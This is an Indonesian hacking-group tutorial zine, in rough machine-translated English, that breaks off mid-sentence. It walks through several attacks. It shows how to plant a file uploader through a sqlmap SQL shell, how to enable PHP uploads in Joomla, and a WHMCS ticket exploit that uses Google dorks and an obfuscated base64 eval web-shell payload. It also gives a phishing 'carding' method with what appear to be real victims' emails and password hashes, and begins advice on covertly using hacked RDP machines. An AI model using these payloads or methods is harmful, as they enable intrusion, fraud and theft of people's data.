DOCS HACKING CONFERENCE Hacking Conference Docs is a documentation contains articles about the basic science of hacking. Part : II Author : Xcaramel
100 % ILLEGAL INDONESIAN GREY HAT ARMY RIAU HACKER TEAM CODE RIAU COMMUNITY
DISCLAIMER : This article is for educational use only and do not in any use. I am not responsible if anything happens. Personal contact :
[email protected]
Visit Us :
igha.net - code-riau.org - blog.code-riau.org indogreyhatarmy.net - indogreyhatarmy.com www.indogreyhatarmy.org
Article Content - How to upload shell use sqlmap - how to upload file in joomla administrator that do not support - How to Bypass Register Com Users set only for superadmin - WHMCS Exploit Submit Ticket - Carding the method scam page - How to use RDP - Checking CVV and Direct Carding
-How to upload shell use sqlmap 1 . First we must have a target first course, example my target http://www.example.com/index.php?id=1
2. prepare your uploader script, as below. PHP Code:
previously used to convert the above script into a hex gan before it can be uploaded, the results are as below Convert script Upload Hex --> http://www.string-functions.com/stringhex.aspx
PHP Code: 3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3 d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d227570 6c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6 97422 2076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f7068702024746172676 5745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e 616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6 16465 6466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f2062617 3656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e222068 6173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
Next Open Your CMD
C:\user\xcaramel>cd c:\Sqlmap C:\Sqlmap> C:\Sqlmap>sqlmap.py -u http://www.example.com/index.php?id=1 --sql-shell
would such as this : [15:35:06] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5 [15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER sql-shell>
Now type SELECT 0x'Hex 'INTO OUTFILE "PATH / filename"; Do not forget to add '0 x 'in front of' HEX ' 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374 696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616 d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e7075742074797 0653d227375626d6974 222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461 726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65 275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c455 35b2775706c6f6164 656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f 20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d6527 5d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f 7221223b7d3f3e into "/home/siemens/public_html/upload.php";
wait and if lucky you will be notified successfully uploaded, if less fortunate so try again if it works please browse our files earlier, Http://www.example.com/upload.php next upload your files .
igha.net - code-riau.org - blog.code-riau.org - indogreyhatarmy.net - indogreyhatarmy.com www.indogreyhatarmy.org
-
-how to upload file in joomla administrator that do not support
1. after login in the administrator open the media manager 2. select options
Command: - Legal Extensions (File Types) there are many types of files names, we simply add the PHP file name, sequential in situ and Illegal MIME Types in the column we add the name of the PHP in situ, 3. if it is then we save, if successful will be like this
Now we try to upload a php file in media manager. This time I will upload a php file file name: kondom.php
If Successfully would like
igha.net - code-riau.org - blog.code-riau.org - indogreyhatarmy.net - indogreyhatarmy.com www.indogreyhatarmy.org
- How to Bypass Register Com Users set only for superadmin Registration failed: Registration failed: Only users with Super Admin permisions can change other Super Admin user accounts.
The first - all the way out the word - the word "Registration Failed" you right-click and then click Inspect Elementlalu replace "Registration Failed"
to "Registration Success" and then click Enter!!
Form input the data according to your wishes then click on Registration
it will have the words "our account has been created and an activation link has been sent to the email address you entered. Note that you must activate the account by clicking on the activation link when you get the email before you can login."
igha.net - code-riau.org - blog.code-riau.org - indogreyhatarmy.net - indogreyhatarmy.com www.indogreyhatarmy.org
WHMCS Exploit Submit Ticket Google Dork : intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered intext:Powered
by by by by by by by by by by by by by by by by by by by by by by by by by by by by by by
WHMCompleteSolution inurl:submitticket.php WHMCompleteSolution inurl:clients/submitticket.php WHMCompleteSolution inurl:client/submitticket.php WHMCompleteSolution inurl:clientsarea/submitticket.php WHMCompleteSolution inurl:clientarea/submitticket.php WHMCompleteSolution inurl:crm/submitticket.php WHMCompleteSolution inurl:cp/submitticket.php WHMCompleteSolution inurl:manage/submitticket.php WHMCompleteSolution inurl:member/submitticket.php WHMCompleteSolution inurl:members/submitticket.php WHMCompleteSolution inurl:billing/submitticket.php WHMCompleteSolution inurl:billings/submitticket.php WHMCompleteSolution inurl:support/submitticket.php WHMCompleteSolution inurl:help/submitticket.php WHMCompleteSolution inurl:secure/submitticket.php WHMCompleteSolution inurl:store/submitticket.php WHMCompleteSolution inurl:whmcs/submitticket.php WHMCompleteSolution inurl:log/submitticket.php WHMCompleteSolution inurl:myaccount/submitticket.php WHMCompleteSolution inurl:orders/submitticket.php WHMCompleteSolution inurl:order/submitticket.php WHMCompleteSolution inurl:portal/submitticket.php WHMCompleteSolution inurl:mc/submitticket.php WHMCompleteSolution inurl:office/submitticket.php WHMCompleteSolution inurl:submitticket.php site:com WHMCompleteSolution inurl:submitticket.php site:org WHMCompleteSolution inurl:submitticket.php site:net WHMCompleteSolution inurl:submitticket.php site:info WHMCompleteSolution inurl:".*/*/submitticket.php" WHMCompleteSolution inurl:".*/submitticket.php"
Examples of targets: www.xcaramel.com/client/submitticket.php
3. if it can be now time to send the ticket target Put the following code in the Form Name, subject, content. {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWI zSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW 1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwY m5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQw aVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHN JQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMV ZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3Blb igidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})
replace url submitticket.php so / templates / jxh.php Example: http://xcaramel.com/client/templates/jxh.php
Next : upload your files . igha.net - code-riau.org - blog.code-riau.org - indogreyhatarmy.net - indogreyhatarmy.com www.indogreyhatarmy.org
- Carding the method scam page 1. Scam page: PAYPAL, VISA, AMAZON, Ebay, Apple 2. Inbox Mailer: Tools for sending mail to many people directly to your inbox detective not to spam 3. Mail list: some email that you want to at least 100 victims jadiin email Full Name : Email : Password James Kamau :
[email protected] : 66e62a11e534d2a5eb8e062d0ca2b6be Online Standard :
[email protected] : d593fe21fbc9cf394e296725e6b8586 Fidel Osano :
[email protected] : a387b826d086fa84db5335e80ed27a1 MatthewShahi :
[email protected] : 9d593fe21fbc9cf394e296725e6b8586 Peter Munji :
[email protected] : d10b4c5c4f54832b490e0aaf1c33cd8d Lucy kaigua :
[email protected] : e1cd51b7ccf75ddebc4270e19cbba31b Peter Njau :
[email protected] : 089543e7ade4bef696f39c9d96c952b2 Dorcas Tuikong :
[email protected] : 22479cdfaa364ff81ae3bff00544790d Leonard indiazi :
[email protected] : fc63540458ad4ce5c048cde5f07ccefc Standard Test :
[email protected] :7c7bbd96546a331bb8c24258e63b65
4. Letter Chase: email in html format which will be sent to the target email containing a confirmation email from the web in a scam to charge identity will switch to our webscam
5. Thinking ability and imagination in developing a combat tool - Step Step In Here
• First we have to edit some parts of the scam page, which is part process.php or usually converted into a send-cc.php find the following code: $ No email send in depanya aja tuh change so email, after email change in process.php The next plug in your scam page hosting and other shell-other • The second we do use email sending mailers jangn forget letternya - First we have to set up the email subject that will be used more dal, see the picture below:
it can be changed and the key should not wear that in the end domains. paypal.com com ato ato do away with paypal.co co.uk, after that what we tell of course, we have to think see the following picture:
The red line is transformed into a scam link you here we are in need of independence, edit it using notepad, then after that copy all the scripts and put the letter in the column do not forget to email a current tick remember do not use plain html. see the following picture:
if successful then there is success and if the notice failing undefine.
igha.net - code-riau.org - blog.code-riau.org - indogreyhatarmy.net - indogreyhatarmy.com www.indogreyhatarmy.org
- How to use RDP RDP stands for Remote Desktop Computer; they are normally hacked or bruted random computers. When using you must remember its someone else's computer so don't download things without hiding it or use it intensely as the admin can notice, and you will lose your RDP. To connect to RDP: Start
